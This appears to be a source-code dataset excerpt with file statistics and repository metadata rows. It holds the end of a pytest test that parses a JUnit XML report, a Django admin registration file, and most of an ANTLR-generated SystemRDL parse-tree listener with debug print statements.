<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[VersionedDatabase]" time="0.001"/>
<testcase classname="test_taskrunnerlib" file="test_taskrunnerlib.py" line="211" name="testTaskRunnerToXML[data0]" time="0.000">
<skipped message="test fails if there is a module reload between collection and execution, as it breaks isinstance() inside __eq__()" type="pytest.skip">test_taskrunnerlib.py:211: test fails if there is a module reload between collection and execution, as it breaks isinstance() inside __eq__()</skipped>
</testcase>
</testsuite>
</testsuites>
'''.lstrip()
report = parseReport(lambda: StringIO(xml), 'report.xml')
assert report is not None
assert report.errors == 0
assert report.failures == 0
assert report.skipped == 1
assert report.numTestcases == 3
assert report.result is ResultCode.OK
assert report.summary == '0 failed, 1 skipped'
data = report.data
assert data['testcases'] == '3'
assert data['checks'] == '3'
assert data['failures'] == '0'
assert data['errors'] == '0'
assert data['skipped'] == '1'
assert len(report.testsuite) == 1
suite, = report.testsuite
assert suite.tests == 3
assert suite.failures == 0
assert suite.errors == 0
assert suite.skipped == 1
assert suite.time == 1.234
assert suite.result is ResultCode.OK
assert len(suite.testcase) == 3
for index, case in enumerate(suite.testcase):
if index == 2:
assert case.result is ResultCode.CANCELLED
assert case.skipped
else:
assert case.result is ResultCode.OK
assert not case.skipped
assert not case.error
assert not case.failure
| 35.786408 | 310 | 0.669696 | 942 | 7,372 | 5.210191 | 0.158174 | 0.048492 | 0.047677 | 0.04564 | 0.814181 | 0.77771 | 0.765485 | 0.755094 | 0.727588 | 0.711491 | 0 | 0.049327 | 0.194249 | 7,372 | 205 | 311 | 35.960976 | 0.776936 | 0.034048 | 0 | 0.721893 | 0 | 0.088757 | 0.417042 | 0.152817 | 0 | 0 | 0 | 0 | 0.568047 | 1 | 0.023669 | false | 0.005917 | 0.017751 | 0 | 0.04142 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
09f6915703aaf25fccd52cfa9b61d0e72e5a0cac | 146 | py | Python | src/logs/admin.py | HitLuca/predict-python | 14f2f55cb29f817a5871d4c0b11a3758285301ca | [
"MIT"
] | 12 | 2018-06-27T08:09:18.000Z | 2021-10-10T22:19:04.000Z | src/logs/admin.py | HitLuca/predict-python | 14f2f55cb29f817a5871d4c0b11a3758285301ca | [
"MIT"
] | 17 | 2018-06-12T17:36:11.000Z | 2020-11-16T21:23:22.000Z | src/logs/admin.py | HitLuca/predict-python | 14f2f55cb29f817a5871d4c0b11a3758285301ca | [
"MIT"
] | 16 | 2018-08-02T14:40:17.000Z | 2021-11-12T12:28:46.000Z | from django.contrib import admin
from src.split.models import Split
from .models import Log
admin.site.register(Log)
admin.site.register(Split)
| 18.25 | 34 | 0.808219 | 23 | 146 | 5.130435 | 0.478261 | 0.20339 | 0.20339 | 0.338983 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109589 | 146 | 7 | 35 | 20.857143 | 0.907692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
61ef6368835ab1ce7fcfb47945246d01b0e079ba | 44,017 | py | Python | src/recogni/system_rdl/SystemRDLListener.py | recogni/open-register-design-tool | 8871630261e0b54291d5885f27fb7ae5f2438cc7 | [
"Apache-2.0"
] | 1 | 2019-12-06T19:11:50.000Z | 2019-12-06T19:11:50.000Z | src/recogni/system_rdl/SystemRDLListener.py | recogni/open-register-design-tool | 8871630261e0b54291d5885f27fb7ae5f2438cc7 | [
"Apache-2.0"
] | null | null | null | src/recogni/system_rdl/SystemRDLListener.py | recogni/open-register-design-tool | 8871630261e0b54291d5885f27fb7ae5f2438cc7 | [
"Apache-2.0"
] | null | null | null | # Generated from ../ordt/parse/grammars/SystemRDL.g4 by ANTLR 4.5.3
from antlr4 import *
if __name__ is not None and "." in __name__:
from .SystemRDLParser import SystemRDLParser
else:
from SystemRDLParser import SystemRDLParser
enable_debug = False
# This class defines a complete listener for a parse tree produced by SystemRDLParser.
class SystemRDLListener(ParseTreeListener):
# Enter a parse tree produced by SystemRDLParser#root.
def enterRoot(self, ctx:SystemRDLParser.RootContext):
if enable_debug:
print("enterRoot")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#root.
def exitRoot(self, ctx:SystemRDLParser.RootContext):
if enable_debug:
print("exitRoot")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#parameter_block.
def enterParameter_block(self, ctx:SystemRDLParser.Parameter_blockContext):
if enable_debug:
print("enterParameter_block")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#parameter_block.
def exitParameter_block(self, ctx:SystemRDLParser.Parameter_blockContext):
if enable_debug:
print("exitParameter_block")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_definition.
def enterProperty_definition(self, ctx:SystemRDLParser.Property_definitionContext):
if enable_debug:
print("enterProperty_definition")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_definition.
def exitProperty_definition(self, ctx:SystemRDLParser.Property_definitionContext):
if enable_debug:
print("exitProperty_definition")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_body.
def enterProperty_body(self, ctx:SystemRDLParser.Property_bodyContext):
if enable_debug:
print("enterProperty_body")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_body.
def exitProperty_body(self, ctx:SystemRDLParser.Property_bodyContext):
if enable_debug:
print("exitProperty_body")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_type.
def enterProperty_type(self, ctx:SystemRDLParser.Property_typeContext):
if enable_debug:
print("enterProperty_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_type.
def exitProperty_type(self, ctx:SystemRDLParser.Property_typeContext):
if enable_debug:
print("exitProperty_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_default.
def enterProperty_default(self, ctx:SystemRDLParser.Property_defaultContext):
if enable_debug:
print("enterProperty_default")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_default.
def exitProperty_default(self, ctx:SystemRDLParser.Property_defaultContext):
if enable_debug:
print("exitProperty_default")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_usage.
def enterProperty_usage(self, ctx:SystemRDLParser.Property_usageContext):
if enable_debug:
print("enterProperty_usage")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_usage.
def exitProperty_usage(self, ctx:SystemRDLParser.Property_usageContext):
if enable_debug:
print("exitProperty_usage")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_component.
def enterProperty_component(self, ctx:SystemRDLParser.Property_componentContext):
if enable_debug:
print("enterProperty_component")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_component.
def exitProperty_component(self, ctx:SystemRDLParser.Property_componentContext):
if enable_debug:
print("exitProperty_component")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_boolean_type.
def enterProperty_boolean_type(self, ctx:SystemRDLParser.Property_boolean_typeContext):
if enable_debug:
print("enterProperty_boolean_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_boolean_type.
def exitProperty_boolean_type(self, ctx:SystemRDLParser.Property_boolean_typeContext):
if enable_debug:
print("exitProperty_boolean_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_string_type.
def enterProperty_string_type(self, ctx:SystemRDLParser.Property_string_typeContext):
if enable_debug:
print("enterProperty_string_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_string_type.
def exitProperty_string_type(self, ctx:SystemRDLParser.Property_string_typeContext):
if enable_debug:
print("exitProperty_string_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_number_type.
def enterProperty_number_type(self, ctx:SystemRDLParser.Property_number_typeContext):
if enable_debug:
print("enterProperty_number_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_number_type.
def exitProperty_number_type(self, ctx:SystemRDLParser.Property_number_typeContext):
if enable_debug:
print("exitProperty_number_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_ref_type.
def enterProperty_ref_type(self, ctx:SystemRDLParser.Property_ref_typeContext):
if enable_debug:
print("enterProperty_ref_type")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_ref_type.
def exitProperty_ref_type(self, ctx:SystemRDLParser.Property_ref_typeContext):
if enable_debug:
print("exitProperty_ref_type")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#component_def.
def enterComponent_def(self, ctx:SystemRDLParser.Component_defContext):
if enable_debug:
print("enterComponent_def")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#component_def.
def exitComponent_def(self, ctx:SystemRDLParser.Component_defContext):
if enable_debug:
print("exitComponent_def")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#explicit_component_inst.
def enterExplicit_component_inst(self, ctx:SystemRDLParser.Explicit_component_instContext):
if enable_debug:
print("enterExplicit_component_inst")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#explicit_component_inst.
def exitExplicit_component_inst(self, ctx:SystemRDLParser.Explicit_component_instContext):
if enable_debug:
print("exitExplicit_component_inst")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#anonymous_component_inst_elems.
def enterAnonymous_component_inst_elems(self, ctx:SystemRDLParser.Anonymous_component_inst_elemsContext):
if enable_debug:
print("enterAnonymous_component_inst_elems")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#anonymous_component_inst_elems.
def exitAnonymous_component_inst_elems(self, ctx:SystemRDLParser.Anonymous_component_inst_elemsContext):
if enable_debug:
print("exitAnonymous_component_inst_elems")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_clause.
def enterExternal_clause(self, ctx:SystemRDLParser.External_clauseContext):
if enable_debug:
print("enterExternal_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_clause.
def exitExternal_clause(self, ctx:SystemRDLParser.External_clauseContext):
if enable_debug:
print("exitExternal_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_parallel_clause.
def enterExternal_parallel_clause(self, ctx:SystemRDLParser.External_parallel_clauseContext):
if enable_debug:
print("enterExternal_parallel_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_parallel_clause.
def exitExternal_parallel_clause(self, ctx:SystemRDLParser.External_parallel_clauseContext):
if enable_debug:
print("exitExternal_parallel_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_sram_clause.
def enterExternal_sram_clause(self, ctx:SystemRDLParser.External_sram_clauseContext):
if enable_debug:
print("enterExternal_sram_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_sram_clause.
def exitExternal_sram_clause(self, ctx:SystemRDLParser.External_sram_clauseContext):
if enable_debug:
print("exitExternal_sram_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_serial8_clause.
def enterExternal_serial8_clause(self, ctx:SystemRDLParser.External_serial8_clauseContext):
if enable_debug:
print("enterExternal_serial8_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_serial8_clause.
def exitExternal_serial8_clause(self, ctx:SystemRDLParser.External_serial8_clauseContext):
if enable_debug:
print("exitExternal_serial8_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_ring_clause.
def enterExternal_ring_clause(self, ctx:SystemRDLParser.External_ring_clauseContext):
if enable_debug:
print("enterExternal_ring_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_ring_clause.
def exitExternal_ring_clause(self, ctx:SystemRDLParser.External_ring_clauseContext):
if enable_debug:
print("exitExternal_ring_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_dly_option_clause.
def enterExternal_dly_option_clause(self, ctx:SystemRDLParser.External_dly_option_clauseContext):
if enable_debug:
print("enterExternal_dly_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_dly_option_clause.
def exitExternal_dly_option_clause(self, ctx:SystemRDLParser.External_dly_option_clauseContext):
if enable_debug:
print("exitExternal_dly_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_opt_option_clause.
def enterExternal_opt_option_clause(self, ctx:SystemRDLParser.External_opt_option_clauseContext):
if enable_debug:
print("enterExternal_opt_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_opt_option_clause.
def exitExternal_opt_option_clause(self, ctx:SystemRDLParser.External_opt_option_clauseContext):
if enable_debug:
print("exitExternal_opt_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_field_data_option_clause.
def enterExternal_field_data_option_clause(self, ctx:SystemRDLParser.External_field_data_option_clauseContext):
if enable_debug:
print("enterExternal_field_data_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_field_data_option_clause.
def exitExternal_field_data_option_clause(self, ctx:SystemRDLParser.External_field_data_option_clauseContext):
if enable_debug:
print("exitExternal_field_data_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#external_rep_level_option_clause.
def enterExternal_rep_level_option_clause(self, ctx:SystemRDLParser.External_rep_level_option_clauseContext):
if enable_debug:
print("enterExternal_rep_level_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#external_rep_level_option_clause.
def exitExternal_rep_level_option_clause(self, ctx:SystemRDLParser.External_rep_level_option_clauseContext):
if enable_debug:
print("exitExternal_rep_level_option_clause")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#component_inst_elem.
def enterComponent_inst_elem(self, ctx:SystemRDLParser.Component_inst_elemContext):
if enable_debug:
print("enterComponent_inst_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#component_inst_elem.
def exitComponent_inst_elem(self, ctx:SystemRDLParser.Component_inst_elemContext):
if enable_debug:
print("exitComponent_inst_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#array.
def enterArray(self, ctx:SystemRDLParser.ArrayContext):
if enable_debug:
print("enterArray")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#array.
def exitArray(self, ctx:SystemRDLParser.ArrayContext):
if enable_debug:
print("exitArray")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#instance_ref.
def enterInstance_ref(self, ctx:SystemRDLParser.Instance_refContext):
if enable_debug:
print("enterInstance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#instance_ref.
def exitInstance_ref(self, ctx:SystemRDLParser.Instance_refContext):
if enable_debug:
print("exitInstance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#simple_instance_ref.
def enterSimple_instance_ref(self, ctx:SystemRDLParser.Simple_instance_refContext):
if enable_debug:
print("enterSimple_instance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#simple_instance_ref.
def exitSimple_instance_ref(self, ctx:SystemRDLParser.Simple_instance_refContext):
if enable_debug:
print("exitSimple_instance_ref")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#verilog_expression.
def enterVerilog_expression(self, ctx:SystemRDLParser.Verilog_expressionContext):
if enable_debug:
print("enterVerilog_expression")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#verilog_expression.
def exitVerilog_expression(self, ctx:SystemRDLParser.Verilog_expressionContext):
if enable_debug:
print("exitVerilog_expression")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#instance_ref_elem.
def enterInstance_ref_elem(self, ctx:SystemRDLParser.Instance_ref_elemContext):
if enable_debug:
print("enterInstance_ref_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#instance_ref_elem.
def exitInstance_ref_elem(self, ctx:SystemRDLParser.Instance_ref_elemContext):
if enable_debug:
print("exitInstance_ref_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_assign.
def enterProperty_assign(self, ctx:SystemRDLParser.Property_assignContext):
if enable_debug:
print("enterProperty_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_assign.
def exitProperty_assign(self, ctx:SystemRDLParser.Property_assignContext):
if enable_debug:
print("exitProperty_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#default_property_assign.
def enterDefault_property_assign(self, ctx:SystemRDLParser.Default_property_assignContext):
if enable_debug:
print("enterDefault_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#default_property_assign.
def exitDefault_property_assign(self, ctx:SystemRDLParser.Default_property_assignContext):
if enable_debug:
print("exitDefault_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#explicit_property_assign.
def enterExplicit_property_assign(self, ctx:SystemRDLParser.Explicit_property_assignContext):
if enable_debug:
print("enterExplicit_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#explicit_property_assign.
def exitExplicit_property_assign(self, ctx:SystemRDLParser.Explicit_property_assignContext):
if enable_debug:
print("exitExplicit_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#post_property_assign.
def enterPost_property_assign(self, ctx:SystemRDLParser.Post_property_assignContext):
if enable_debug:
print("enterPost_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#post_property_assign.
def exitPost_property_assign(self, ctx:SystemRDLParser.Post_property_assignContext):
if enable_debug:
print("exitPost_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_assign_rhs.
def enterProperty_assign_rhs(self, ctx:SystemRDLParser.Property_assign_rhsContext):
if enable_debug:
print("enterProperty_assign_rhs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_assign_rhs.
def exitProperty_assign_rhs(self, ctx:SystemRDLParser.Property_assign_rhsContext):
if enable_debug:
print("exitProperty_assign_rhs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#concat.
def enterConcat(self, ctx:SystemRDLParser.ConcatContext):
if enable_debug:
print("enterConcat")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#concat.
def exitConcat(self, ctx:SystemRDLParser.ConcatContext):
if enable_debug:
print("exitConcat")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#concat_elem.
def enterConcat_elem(self, ctx:SystemRDLParser.Concat_elemContext):
if enable_debug:
print("enterConcat_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#concat_elem.
def exitConcat_elem(self, ctx:SystemRDLParser.Concat_elemContext):
if enable_debug:
print("exitConcat_elem")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property.
def enterProperty(self, ctx:SystemRDLParser.PropertyContext):
if enable_debug:
print("enterProperty")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property.
def exitProperty(self, ctx:SystemRDLParser.PropertyContext):
if enable_debug:
print("exitProperty")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#unimplemented_property.
def enterUnimplemented_property(self, ctx:SystemRDLParser.Unimplemented_propertyContext):
if enable_debug:
print("enterUnimplemented_property")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#unimplemented_property.
def exitUnimplemented_property(self, ctx:SystemRDLParser.Unimplemented_propertyContext):
if enable_debug:
print("exitUnimplemented_property")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_rvalue_constant.
def enterProperty_rvalue_constant(self, ctx:SystemRDLParser.Property_rvalue_constantContext):
if enable_debug:
print("enterProperty_rvalue_constant")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_rvalue_constant.
def exitProperty_rvalue_constant(self, ctx:SystemRDLParser.Property_rvalue_constantContext):
if enable_debug:
print("exitProperty_rvalue_constant")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#property_modifier.
def enterProperty_modifier(self, ctx:SystemRDLParser.Property_modifierContext):
if enable_debug:
print("enterProperty_modifier")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#property_modifier.
def exitProperty_modifier(self, ctx:SystemRDLParser.Property_modifierContext):
if enable_debug:
print("exitProperty_modifier")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#id.
def enterId(self, ctx:SystemRDLParser.IdContext):
if enable_debug:
print("enterId")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#id.
def exitId(self, ctx:SystemRDLParser.IdContext):
if enable_debug:
print("exitId")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#num.
def enterNum(self, ctx:SystemRDLParser.NumContext):
if enable_debug:
print("enterNum")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#num.
def exitNum(self, ctx:SystemRDLParser.NumContext):
if enable_debug:
print("exitNum")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#str.
def enterStr(self, ctx:SystemRDLParser.StrContext):
if enable_debug:
print("enterStr")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#str.
def exitStr(self, ctx:SystemRDLParser.StrContext):
if enable_debug:
print("exitStr")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_def.
def enterEnum_def(self, ctx:SystemRDLParser.Enum_defContext):
if enable_debug:
print("enterEnum_def")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_def.
def exitEnum_def(self, ctx:SystemRDLParser.Enum_defContext):
if enable_debug:
print("exitEnum_def")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_body.
def enterEnum_body(self, ctx:SystemRDLParser.Enum_bodyContext):
if enable_debug:
print("enterEnum_body")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_body.
def exitEnum_body(self, ctx:SystemRDLParser.Enum_bodyContext):
if enable_debug:
print("exitEnum_body")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_entry.
def enterEnum_entry(self, ctx:SystemRDLParser.Enum_entryContext):
if enable_debug:
print("enterEnum_entry")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_entry.
def exitEnum_entry(self, ctx:SystemRDLParser.Enum_entryContext):
if enable_debug:
print("exitEnum_entry")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#enum_property_assign.
def enterEnum_property_assign(self, ctx:SystemRDLParser.Enum_property_assignContext):
if enable_debug:
print("enterEnum_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#enum_property_assign.
def exitEnum_property_assign(self, ctx:SystemRDLParser.Enum_property_assignContext):
if enable_debug:
print("exitEnum_property_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#ext_parms_root.
def enterExt_parms_root(self, ctx:SystemRDLParser.Ext_parms_rootContext):
if enable_debug:
print("enterExt_parms_root")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#ext_parms_root.
def exitExt_parms_root(self, ctx:SystemRDLParser.Ext_parms_rootContext):
if enable_debug:
print("exitExt_parms_root")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#ext_parm_defs.
def enterExt_parm_defs(self, ctx:SystemRDLParser.Ext_parm_defsContext):
if enable_debug:
print("enterExt_parm_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#ext_parm_defs.
def exitExt_parm_defs(self, ctx:SystemRDLParser.Ext_parm_defsContext):
if enable_debug:
print("exitExt_parm_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#global_defs.
def enterGlobal_defs(self, ctx:SystemRDLParser.Global_defsContext):
if enable_debug:
print("enterGlobal_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#global_defs.
def exitGlobal_defs(self, ctx:SystemRDLParser.Global_defsContext):
if enable_debug:
print("exitGlobal_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#global_parm_assign.
def enterGlobal_parm_assign(self, ctx:SystemRDLParser.Global_parm_assignContext):
if enable_debug:
print("enterGlobal_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#global_parm_assign.
def exitGlobal_parm_assign(self, ctx:SystemRDLParser.Global_parm_assignContext):
if enable_debug:
print("exitGlobal_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_in_defs.
def enterRdl_in_defs(self, ctx:SystemRDLParser.Rdl_in_defsContext):
if enable_debug:
print("enterRdl_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_in_defs.
def exitRdl_in_defs(self, ctx:SystemRDLParser.Rdl_in_defsContext):
if enable_debug:
print("exitRdl_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_in_parm_assign.
def enterRdl_in_parm_assign(self, ctx:SystemRDLParser.Rdl_in_parm_assignContext):
if enable_debug:
print("enterRdl_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_in_parm_assign.
def exitRdl_in_parm_assign(self, ctx:SystemRDLParser.Rdl_in_parm_assignContext):
if enable_debug:
print("exitRdl_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_in_defs.
def enterJspec_in_defs(self, ctx:SystemRDLParser.Jspec_in_defsContext):
if enable_debug:
print("enterJspec_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_in_defs.
def exitJspec_in_defs(self, ctx:SystemRDLParser.Jspec_in_defsContext):
if enable_debug:
print("exitJspec_in_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#jspec_in_parm_assign.
def enterJspec_in_parm_assign(self, ctx:SystemRDLParser.Jspec_in_parm_assignContext):
if enable_debug:
print("enterJspec_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#jspec_in_parm_assign.
def exitJspec_in_parm_assign(self, ctx:SystemRDLParser.Jspec_in_parm_assignContext):
if enable_debug:
print("exitJspec_in_parm_assign")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_out_defs.
def enterRdl_out_defs(self, ctx:SystemRDLParser.Rdl_out_defsContext):
if enable_debug:
print("enterRdl_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Exit a parse tree produced by SystemRDLParser#rdl_out_defs.
def exitRdl_out_defs(self, ctx:SystemRDLParser.Rdl_out_defsContext):
if enable_debug:
print("exitRdl_out_defs")
print(" |" + ctx.getText() + "|\n")
pass
# Enter a parse tree produced by SystemRDLParser#rdl_out_parm_assign.
